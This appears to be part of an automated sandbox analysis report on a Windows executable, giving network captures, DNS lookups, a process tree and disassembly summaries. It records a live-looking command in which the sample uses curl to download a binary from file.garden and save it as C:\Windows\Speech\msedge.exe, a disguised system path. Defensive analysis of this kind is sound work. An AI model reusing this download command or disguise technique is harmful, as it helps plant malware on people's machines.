Sep 30, 2024 18:30:56.175915003 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.175966978 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.176027060 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.186424017 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.186461926 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.771071911 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.771193981 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.774677038 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.774694920 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.774954081 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.778198957 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.823412895 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897663116 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897711039 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897737980 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897763968 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.897775888 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897826910 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.897830963 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897869110 CEST	443	49706	188.114.96.3	192.168.2.5
Sep 30, 2024 18:30:56.897912025 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.904772043 CEST	49706	443	192.168.2.5	188.114.96.3
Sep 30, 2024 18:30:56.904792070 CEST	443	49706	188.114.96.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:30:56.158054113 CEST	63103	53	192.168.2.5	1.1.1.1
Sep 30, 2024 18:30:56.169568062 CEST	53	63103	1.1.1.1	192.168.2.5
Sep 30, 2024 18:31:41.514843941 CEST	53	52016	162.159.36.2	192.168.2.5
Sep 30, 2024 18:31:41.997232914 CEST	53	65416	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:30:56.158054113 CEST	192.168.2.5	1.1.1.1	0x6e70	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:30:56.169568062 CEST	1.1.1.1	192.168.2.5	0x6e70	No error (0)	file.garden		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:30:56.169568062 CEST	1.1.1.1	192.168.2.5	0x6e70	No error (0)	file.garden		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	188.114.96.3	443	4524	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:30:56 UTC	101	OUT	GET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:30:56 UTC	584	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:30:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VubYdQPecO9mHVT5rRQqBZxMb6hCRsBqvidNvmOSBU6avSnyca6XMGvEpBGcEHTaFo3DZIuklvjsrQ4Ef%2FAVwQnwZy3lnwdlcNOTcTYF3UclHAdCo3UTu9AGTBcVXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cb599b54ac48c3c-EWR
2024-09-30 16:30:56 UTC	785	IN	Data Raw: 31 31 34 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1144<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-30 16:30:56 UTC	1369	IN	Data Raw: 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 Data Ascii: es-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieE
2024-09-30 16:30:56 UTC	1369	IN	Data Raw: 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4a 35 44 68 2e 72 52 69 53 75 4e 4e 71 4f 39 57 37 57 5f 5a 6f 59 33 4f 6f 55 50 43 73 4c 6d 62 38 6f 73 6f 74 73 73 71 70 31 41 2d 31 37 32 37 37 31 33 38 35 36 2d 30 2e 30 2e 31 2e 31 2d 2f 5a 6c 6f 42 59 78 46 59 32 41 66 51 52 4e 6f 69 2f 64 78 33 64 39 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 Data Ascii: ="GET" enctype="text/plain"> <input type="hidden" name="atok" value="J5Dh.rRiSuNNqO9W7W_ZoY3OoUPCsLmb8osotssqp1A-1727713856-0.0.1.1-/ZloBYxFY2AfQRNoi/dx3d9.bin"> <a href="https://www.cloudflare.com/learni
2024-09-30 16:30:56 UTC	905	IN	Data Raw: 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f Data Ascii: 6.123.33</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-erro
2024-09-30 16:30:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:30:54
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\4sTTCruY06.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\4sTTCruY06.exe"
Imagebase:	0x7ff69dcd0000
File size:	403'456 bytes
MD5 hash:	5A4BBFBB9E1269CBC36A6371D77ACBFC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:30:54
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:30:54
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
Imagebase:	0x7ff785d60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:30:54
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
Imagebase:	0x7ff797150000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	33.8%
Total number of Nodes:	266
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF69DCD1230 Relevance: 49.7, APIs: 24, Strings: 4, Instructions: 651
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF69DCD1297
GetSystemMetrics.USER32 ref: 00007FF69DCD129F
GetSystemMetrics.USER32 ref: 00007FF69DCD12B9

Strings

a}^U, xrefs: 00007FF69DCD29AD
ntdll.dll, xrefs: 00007FF69DCD2012
,ydE, xrefs: 00007FF69DCD2413
\\.\{a88a276e-7abe-4381-9b7b-3e470c634868}, xrefs: 00007FF69DCD149F

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: MetricsSystem$CreateThread
String ID: ,ydE$\\.\{a88a276e-7abe-4381-9b7b-3e470c634868}$a}^U$ntdll.dll
API String ID: 889271177-960994179
Opcode ID: 8f169d80d77ebc2417053dbb3445d214e2709d73caf2d3ad4744d53e74055482
Instruction ID: 26f783ee701134eab3da5dcc68ee9b6c5bc945cf05d60eabedcfa3da90d081cd
Opcode Fuzzy Hash: 8f169d80d77ebc2417053dbb3445d214e2709d73caf2d3ad4744d53e74055482
Instruction Fuzzy Hash: AF52DA22D197818AE7219F35D8411B9B3B4FF95348F409376EA8DA6A65FF3CE186C340

Function 00007FF69DCD30A0 Relevance: 13.6, APIs: 9, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD3119
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF69DCD3139
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD3149
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD3196
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF69DCD31BF
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD31E6
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF69DCD322C
?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF69DCD3233
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF69DCD3240

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 4121003011-0
Opcode ID: 712f323c0604f6e08ee02be1f8088f9027d322c31263b320504701cedf2872dd
Instruction ID: 8acc032d521e5134f9761b35d9d5cde9ea5add6fbe338e38c5966c7fc649f9eb
Opcode Fuzzy Hash: 712f323c0604f6e08ee02be1f8088f9027d322c31263b320504701cedf2872dd
Instruction Fuzzy Hash: CF514122A49A42C1EB318B59D990238A7B4FF85F95F15C672CF9E837A0DF39D4478340

Function 00007FF69DCD3280 Relevance: 13.6, APIs: 9, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD32CF
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF69DCD32EF
?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF69DCD32FF
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD335D
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD3384
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF69DCD33BD
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF69DCD3401
?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF69DCD3408
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF69DCD3415

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 3107587312-0
Opcode ID: ceb5174cdfb678df6d66a02f399e29ac295f59472da4735e7f8ec5c58072d53b
Instruction ID: 7e50aeb8b43c9cfa3f3c515ecfd682953d2410bd594a3dcc226d7affa8aec801
Opcode Fuzzy Hash: ceb5174cdfb678df6d66a02f399e29ac295f59472da4735e7f8ec5c58072d53b
Instruction Fuzzy Hash: E2514E32609A81C6EB208F59E6D0238ABB0FF85F95F158672CE9E87760DF39D4578340

Non-executed Functions

Function 00007FF69DD07000 Relevance: 52.3, APIs: 34, Instructions: 1282COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD07126
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD07147
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD071B4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD07202
memset.VCRUNTIME140 ref: 00007FF69DD07228
memset.VCRUNTIME140 ref: 00007FF69DD0723A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD08365
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD0838B

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 5c3df57c7a27f6585d9e04badd17906bfcd3c1d59ab75e6b294e808623ca5f87
Instruction ID: 921b7b872a71e121cb72de929471eb8eb7c41f22fcee17f2c9e8eaa385610631
Opcode Fuzzy Hash: 5c3df57c7a27f6585d9e04badd17906bfcd3c1d59ab75e6b294e808623ca5f87
Instruction Fuzzy Hash: E9C2AE32B04A858AE7248F26D44077D77A4FB88B88F049775DE8E97B94EF38E855C740

Function 00007FF69DCE6E12 Relevance: 48.3, APIs: 15, Strings: 12, Instructions: 1059fileCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DCE6E5B

Part of subcall function 00007FF69DCFAEE0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCFAF13
Part of subcall function 00007FF69DCFAEE0: memmove.VCRUNTIME140(?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCFAF2F
Part of subcall function 00007FF69DCFAEE0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCFAF4F

Part of subcall function 00007FF69DCFAD20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAD50
Part of subcall function 00007FF69DCFAD20: memmove.VCRUNTIME140 ref: 00007FF69DCFAD6C
Part of subcall function 00007FF69DCFAD20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAD8C

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE6F1D
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE6FAB
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE6FB4
acosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE7334
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE7343
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCE7382

Strings

333?, xrefs: 00007FF69DCE7E9F
(Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming), xrefs: 00007FF69DCE8078
Click %s Button to break in debugger! (remap w/ Ctrl+Shift), xrefs: 00007FF69DCE7F13
Remap w/ Ctrl+Shift: click anywhere to select new mouse button., xrefs: 00007FF69DCE7EFD
Middle, xrefs: 00007FF69DCE7EE8
Right, xrefs: 00007FF69DCE7EDC
Debug##Default, xrefs: 00007FF69DCE8092
HoveredId: 0x%08X, xrefs: 00007FF69DCE7EB8
Left, xrefs: 00007FF69DCE7ED0
Press ESC to abort picking., xrefs: 00007FF69DCE7EC4
gfff, xrefs: 00007FF69DCE80FD
NewFrame(): ClearActiveID() because it isn't marked alive anymore!, xrefs: 00007FF69DCE7539

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freememmove$malloc$acosfceilfcosffclosefwrite
String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$333?$Click %s Button to break in debugger! (remap w/ Ctrl+Shift)$Debug##Default$HoveredId: 0x%08X$Left$Middle$NewFrame(): ClearActiveID() because it isn't marked alive anymore!$Press ESC to abort picking.$Remap w/ Ctrl+Shift: click anywhere to select new mouse button.$Right$gfff
API String ID: 2179310466-1374454768
Opcode ID: 0ee57dce658e20ccf20fbebd1ee4759b6f954246ba2a2fd3b70c4b800430646f
Instruction ID: 4ba97386d6498a3a22624e8d9b5a6160f9e68da1c773e8aa58e55a81671305c6
Opcode Fuzzy Hash: 0ee57dce658e20ccf20fbebd1ee4759b6f954246ba2a2fd3b70c4b800430646f
Instruction Fuzzy Hash: D1B20472A046C2C6E729CF35C5452B877B8FF44B84F088276DB99972D1EF38B9628710

Function 00007FF69DCD5FE0 Relevance: 37.3, APIs: 19, Strings: 2, Instructions: 501
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF69DCD3650: _Query_perf_frequency.MSVCP140 ref: 00007FF69DCD365D
Part of subcall function 00007FF69DCD3650: _Query_perf_counter.MSVCP140 ref: 00007FF69DCD3666

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD624C
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD6363
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD6383
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD63A0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD63C0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD63DA
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD63F7
GetAsyncKeyState.USER32 ref: 00007FF69DCD6576
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD6607
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD6627
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD665F
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD667F
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD66A0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD66BD
_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF69DCD6864
srand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF69DCD686C
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF69DCD687B
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF69DCD688A
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF69DCD68A7

Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD57FC
Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5808
Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5819
Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD582D
Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD583A
Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5847

Strings

@KL, xrefs: 00007FF69DCD60D5
VUUU, xrefs: 00007FF69DCD68B0

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
